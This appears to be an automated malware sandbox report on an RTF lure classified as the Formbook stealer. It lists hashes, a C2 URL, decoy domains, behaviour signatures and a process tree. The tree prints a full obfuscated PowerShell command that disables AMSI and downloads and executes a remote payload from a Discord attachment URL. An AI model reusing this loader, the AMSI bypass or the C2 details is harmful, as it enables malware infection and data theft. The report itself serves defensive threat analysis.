Overview

overview

10

Static

static

Req No. 18...oc.rtf

windows7_x64

10

Req No. 18...oc.rtf

windows10_x64

1

Analysis

  • max time kernel
    147s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    18-01-2021 06:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Req No. 1807164 LP21.doc.rtf

  • Size

    1.5MB

  • MD5

    33ce04c3aaff4168b756498f34429eaf

  • SHA1

    8d2526c297d691bf04cc1a3b3add8e2303841cdf

  • SHA256

    3687f2ed161b33f5c9dba06ac1bc784f15a83c353a594d2cf9724bcb6f9c56ff

  • SHA512

    3c641ddd9bdfff484f621d97fb7c4e1196f51cb7e5a0b81b2671351d5511909b811c0b8ac1aefec7180b215280afba889f5c2d7cedb4ecf214b5276d9289dcc7

Score
10/10
formbookratspywarestealertrojan

Malware Config

Extracted

Family

formbook

C2

http://www.raleighblacknursesrock.com/sly/

Decoy

nature-nectar.com

lavenderbunch.com

itsguapo.com

silabrenda.digital

madelynmason.com

uslawyer911.com

sumarjewelry.com

therefundexperts.com

smartunity.community

jamesdalby.com

7697vip3.com

bytethug.com

f22.info

positivechargerecycling.com

srimps.net

conversica.partners

chezmireillestore.com

ukiyoservices.com

catsdungeon.com

svactionwmdp7955.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 3 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1272
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Req No. 1807164 LP21.doc.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:1632
    • C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\SysWOW64\ipconfig.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Gathers network information
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:932
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\WINDOWS\syswow64\calc.exe"
        3⤵
          PID:756
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\SysWOW64\CmD.exe
        CmD.exe /C cscript %tmp%\Client.vbs A C
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\cscript.exe
          cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
          3⤵
            PID:1780
      • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
        Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$800351095838605342800351095838605342800351095838605342=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,57,56,54,52,53,50,57,52,49,52,56,55,52,55,51,52,55,47,56,48,48,51,53,49,48,57,53,56,51,56,54,48,53,51,52,50,47,115,101,108,108,121,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($800351095838605342800351095838605342800351095838605342)|I`E`X
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:596
        • C:\WINDOWS\syswow64\calc.exe
          "{path}"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:1436

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Command-Line Interface

      1
      T1059

      Exploitation for Client Execution

      1
      T1203

      Persistence

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Client.vbs
        MD5

        8441686d35e4c4ffc920c51d345ed325

        SHA1

        6cf3b6fc866c57479c0a0cd78c2e1a55e7989b3f

        SHA256

        3d29d2e97327dcd50f03da93eff9bb90a0ec06f56eade454c944b89865e51ff3

        SHA512

        2ab52182eb8af01230dd562662c4b1e8e6e3a45c460d9544d0525feb8f63a3c7f5adf4a5d976ff7f45214f5c03973210b33304f03249613ce968cf3a36c9db0f

        Download Submit
      • memory/596-19-0x000000001B6D0000-0x000000001B6D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-16-0x0000000002660000-0x0000000002661000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-18-0x0000000002300000-0x0000000002301000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-23-0x000000001C600000-0x000000001C645000-memory.dmp
        Filesize

        276KB

        Download
      • memory/596-21-0x000000001ABEA000-0x000000001AC09000-memory.dmp
        Filesize

        124KB

        Download
      • memory/596-20-0x000000001AB50000-0x000000001AB51000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-11-0x000007FEFC1C1000-0x000007FEFC1C3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/596-12-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp
        Filesize

        9.9MB

        Download
      • memory/596-13-0x00000000023A0000-0x00000000023A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-14-0x000000001AC60000-0x000000001AC61000-memory.dmp
        Filesize

        4KB

        Download
      • memory/596-15-0x000000001ABE0000-0x000000001ABE2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/596-17-0x000000001ABE4000-0x000000001ABE6000-memory.dmp
        Filesize

        8KB

        Download
      • memory/756-32-0x0000000000000000-mapping.dmp
        Download
      • memory/932-36-0x0000000001E70000-0x0000000001F03000-memory.dmp
        Filesize

        588KB

        Download
      • memory/932-35-0x00000000020A0000-0x00000000023A3000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/932-34-0x0000000000080000-0x00000000000AE000-memory.dmp
        Filesize

        184KB

        Download
      • memory/932-33-0x00000000009C0000-0x00000000009CA000-memory.dmp
        Filesize

        40KB

        Download
      • memory/932-30-0x0000000000000000-mapping.dmp
        Download
      • memory/1272-29-0x0000000006480000-0x0000000006611000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1436-27-0x0000000000A00000-0x0000000000D03000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/1436-28-0x0000000000190000-0x00000000001A4000-memory.dmp
        Filesize

        80KB

        Download
      • memory/1436-24-0x0000000000400000-0x000000000042E000-memory.dmp
        Filesize

        184KB

        Download
      • memory/1436-25-0x000000000041EBA0-mapping.dmp
        Download
      • memory/1576-22-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmp
        Filesize

        2.5MB

        Download
      • memory/1624-6-0x0000000000000000-mapping.dmp
        Download
      • memory/1632-3-0x0000000070741000-0x0000000070743000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1632-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1632-2-0x0000000072CC1000-0x0000000072CC4000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1720-5-0x0000000076341000-0x0000000076343000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1780-7-0x0000000000000000-mapping.dmp
        Download
      • memory/1780-10-0x00000000028D0000-0x00000000028D4000-memory.dmp
        Filesize

        16KB

        Download